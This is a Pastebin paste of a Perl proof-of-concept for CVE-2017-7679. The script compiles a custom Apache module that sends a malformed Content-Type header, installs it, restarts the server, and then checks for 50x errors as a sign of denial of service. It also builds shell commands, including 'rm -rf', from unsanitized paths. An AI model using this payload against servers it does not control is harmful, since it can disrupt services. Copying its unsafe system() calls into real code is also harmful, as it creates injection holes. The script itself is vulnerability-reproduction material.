API tools faq
paste
UY-Scuti

Untitled

UY-Scuti
Jun 2nd, 2019
298
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.83 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. # Michael Gottburg - https://github.com/gottburgm/
  3.  
  4. use 5.10.0;
  5.  
  6. use strict;
  7. use warnings;
  8.  
  9. no warnings 'experimental';
  10.  
  11. use LWP::UserAgent;
  12. use HTTP::Request;
  13. use HTTP::Cookies;
  14. use HTTP::Response;
  15.  
  16. # Global Variables
  17. my $apache_install = 0;
  18. my $url = 0;
  19. $url = $ARGV[0] or help();
  20. $apache_install = $ARGV[1] or help();
  21.  
  22. if(-d $apache_install) {
  23. # Display The Header
  24. header();
  25.  
  26. # Run The PoC
  27. exploit($apache_install, $url);
  28. } else {
  29. print "[!] Couldn't Read/Find : $apache_install\n";
  30. help();
  31. }
  32.  
  33. sub header {
  34. print "\n\n";
  35. my $title = "=================================[ CVE-2017-7679 ]=================================";
  36.  
  37. print qq{
  38. $title
  39.  
  40. Reporter : ChenQin and Hanno Böck
  41. Date : 2017-06-20
  42. CVE : CVE-2017-7679
  43.  
  44. Description :
  45.  
  46. In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, mod_mime
  47. can read one byte past the end of a buffer when sending a malicious
  48. Content-Type response header.
  49.  
  50.  
  51. };
  52. print "="x(length($title)) . "\n\n";
  53. }
  54.  
  55. sub help {
  56. print "\n";
  57. print qq {
  58. Usage : perl $0 <URL> <APACHE_INSTALL_PATH>
  59.  
  60. ---------------------------------------------------------
  61. [EXAMPLE] perl $0 http://localhost:1337/ /usr/local/apache2
  62.  
  63. Note: Apache Install Path Must Be Absolute.
  64.  
  65. };
  66. print "\n\n";
  67. exit;
  68. }
  69.  
  70. sub buildRequester {
  71. my ( $useragent, $timeout, $proxy ) = @_;
  72. $proxy = 0 if(!defined($proxy));
  73. my $browser = 0;
  74. my $cookie_jar = 0;
  75.  
  76. $cookie_jar = HTTP::Cookies->new(
  77. file => "/tmp/cookies.lwp",
  78. autosave => 1,
  79. );
  80.  
  81. $browser = LWP::UserAgent->new();
  82. $browser->protocols_allowed( [qw( http https ftp )] );
  83. $browser->requests_redirectable(['GET', 'POST', 'HEAD', 'OPTIONS']);
  84. $browser->cookie_jar( $cookie_jar);
  85.  
  86. ### Custom Options
  87. $browser->timeout($timeout);
  88. $browser->agent($useragent);
  89.  
  90. if($proxy) {
  91. $browser->proxy( [qw( http https ftp ftps )] => $proxy);
  92. }
  93.  
  94. return $browser;
  95. }
  96.  
  97. sub buildRequest {
  98. my ( $url, $method, $payload, $content_type) = @_;
  99. $content_type = 'application/x-www-form-urlencoded' if(!defined($content_type) || !$content_type);
  100. $payload = '' if(!defined($payload) || !$content_type);
  101. $method = uc($method);
  102. my $request = 0;
  103.  
  104. if($method eq "GET") {
  105. $request = new HTTP::Request $method, $url . '?' . $payload;
  106. } else {
  107. $request = new HTTP::Request $method, $url;
  108. $request->content($payload);
  109. }
  110. $request->content_type($content_type);
  111.  
  112. return $request;
  113. }
  114.  
  115. sub exploit {
  116. my ( $apache_install, $url ) = @_;
  117. my $browser = 0;
  118. my $useragent = '';
  119. my $request = 0;
  120. my $response = 0;
  121. my $proxy = 0;
  122. my $timeout = 30;
  123. my $name = "CVE_2017_7679";
  124.  
  125. ### Setting Up The Requester
  126. $browser = buildRequester($useragent, $timeout, $proxy);
  127.  
  128. $url .= "$name/";
  129.  
  130. buildModule($apache_install, $name);
  131.  
  132. print "[*] Sending GET Request On : $url\n";
  133. $request = buildRequest($url, "GET", "", 0);
  134. $response = $browser->request($request);
  135. print "\tResponse Code : " . $response->code . "\n\tResponse Content :\n\t" . $response->content ."\n\n";
  136. print "[*] Server Seems To Be Affected ... Confirming ...\n" if($response->code =~ /50[0-9]/);
  137.  
  138. print "[*] Sending Second Request To Check If The Denial Of Service Worked On : $url\n";
  139. $request = buildRequest($url, "GET", "", 0);
  140. $response = $browser->request($request);
  141. print "\tResponse Code : " . $response->code . "\n\n";
  142.  
  143. if($response->code =~ /50[0-9]/) {
  144. print "[+] Server Is Affected .\n";
  145. } else {
  146. print "[-] Server Is NOT Affected .\n";
  147. }
  148.  
  149. if(-f "$apache_install/conf/httpd.conf.backup") {
  150. print "[*] Recovering Apache Configuration File From Backup : $apache_install/conf/httpd.conf.backup\n";
  151. system("mv $apache_install/conf/httpd.conf.backup $apache_install/conf/httpd.conf");
  152. }
  153. }
  154.  
  155. sub buildModule {
  156. my ($apache_install, $name) = @_;
  157. my $module_name = "mod_$name";
  158. my $template_file = 'mod_template.tpl',
  159. my $config_file = "$module_name.conf";
  160. my $module_file = "$module_name.c";
  161. my $module_template_path = "src/$template_file";
  162. my $module_dir = "$apache_install/$name";
  163. my $public_dir = 0;
  164.  
  165. # malicious content type
  166. my $content_type = "text/htmla\\0 ";
  167.  
  168. my @config_content = ();
  169. my @module_content = ();
  170.  
  171. ### Build Apache Module
  172. if(-f "$apache_install/bin/apxs") {
  173. print "[+] APXS Found : $apache_install/bin/apxs\n";
  174. print "[*] Building Module $module_name From Template : $module_template_path\n";
  175.  
  176. my @content = read_file($module_template_path, 1);
  177. foreach my $line (@content) {
  178. if($line =~ /__NAME__/i) {
  179. $line =~ s/__NAME__/$name/gi;
  180. } elsif ($line =~ /__MODULE-NAME__/i) {
  181. $line =~ s/__MODULE-NAME__/$module_name/gi;
  182. } elsif ($line =~ /__CONTENT-TYPE__/i) {
  183. $line =~ s/__CONTENT-TYPE__/$content_type/gi;
  184. }
  185. push(@module_content, "$line\n");
  186. }
  187.  
  188. print "[*] Writting Module In : $module_dir\n";
  189. system("rm -rf $module_dir") if(-d $module_dir);
  190. system("cd $apache_install; $apache_install/bin/apxs -g -n $name");
  191.  
  192. if(-d $module_dir && -f "src/$config_file") {
  193. write_file("$module_dir/$module_file", @module_content);
  194. if(-d "$apache_install/htdocs") {
  195. $public_dir = "$apache_install/htdocs";
  196. } else {
  197. if(-d "$apache_install/html") {
  198. $public_dir = "$apache_install/html";
  199. } else {
  200. print "[-] Couldn't Locate Apache Public Directory ...\n";
  201. exit;
  202. }
  203. }
  204.  
  205. if(!-d "$public_dir/$name") {
  206. print "[*] Creating Web Directory For Handler : $public_dir/$name\n";
  207. system("mkdir -p $public_dir/$name");
  208.  
  209. }
  210. print "[*] Backuping Apache Configuration File : $apache_install/conf/httpd.conf => $apache_install/conf/httpd.conf.backup\n";
  211. system("cp $apache_install/conf/httpd.conf $apache_install/conf/httpd.conf.backup");
  212. @content = read_file("src/$config_file");
  213. foreach my $line (@content) {
  214. chomp $line;
  215. if($line =~ /__NAME__/i) {
  216. $line =~ s/__NAME__/$name/gi;
  217. }
  218. push(@config_content, "$line\n");
  219. }
  220. print "[*] Compiling Module ...\n";
  221. system("$apache_install/bin/apxs -i -a -c $module_dir/$module_file");
  222.  
  223. print "[*] Adding Module Configuration Into Apache Configuration : $apache_install/conf/httpd.conf\n";
  224. append_after("$apache_install/conf/httpd.conf", "LoadModule $name", @config_content);
  225. write_file("$module_dir/$config_file", @config_content);
  226. } else {
  227. print "[-] Couldn't Write : $module_dir\n";
  228. exit;
  229. }
  230. } else {
  231. print "[-] Error : APXS And/Or Module File Not Found .\n";
  232. exit;
  233. }
  234.  
  235. print "[*] Restarting Apache ...\n";
  236. system("$apache_install/bin/apachectl restart");
  237. }
  238.  
  239. sub append_after {
  240. my ( $file, $string, @append_lines ) = @_;
  241. my @content = read_file($file);
  242. my @new_content = ();
  243.  
  244. foreach my $line (@content) {
  245. chomp $line;
  246. if($line =~ /$string/i) {
  247. push(@new_content, "$line\n");
  248. foreach my $append_line (@append_lines) {
  249. push(@new_content, "$append_line\n");
  250. }
  251. } else {
  252. push(@new_content, "$line\n");
  253. }
  254. }
  255. write_file($file, @new_content);
  256. }
  257.  
  258. sub read_file {
  259. my ($file, $chomp) = @_;
  260. $chomp = 0 if(!defined($chomp));
  261.  
  262. my @final_content = ();
  263.  
  264. open FILE, $file or die print "[-] $file Couldn't Be Read .\n";
  265. my @content = <FILE>;
  266. close FILE;
  267.  
  268. if($chomp) {
  269. foreach my $line (@content) {
  270. chomp $line;
  271. push(@final_content, $line);
  272. }
  273. } else {
  274. @final_content = @content;
  275. }
  276.  
  277. return @final_content;
  278. }
  279.  
  280. sub write_file {
  281. my ( $file, @content ) = @_;
  282.  
  283. open FILE, ">", $file or die print "[-] $file Couldn't Be Open : " . $@ . "\n";
  284. foreach my $line (@content) {
  285. print FILE $line if($line);
  286. }
  287. close FILE;
  288. }
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!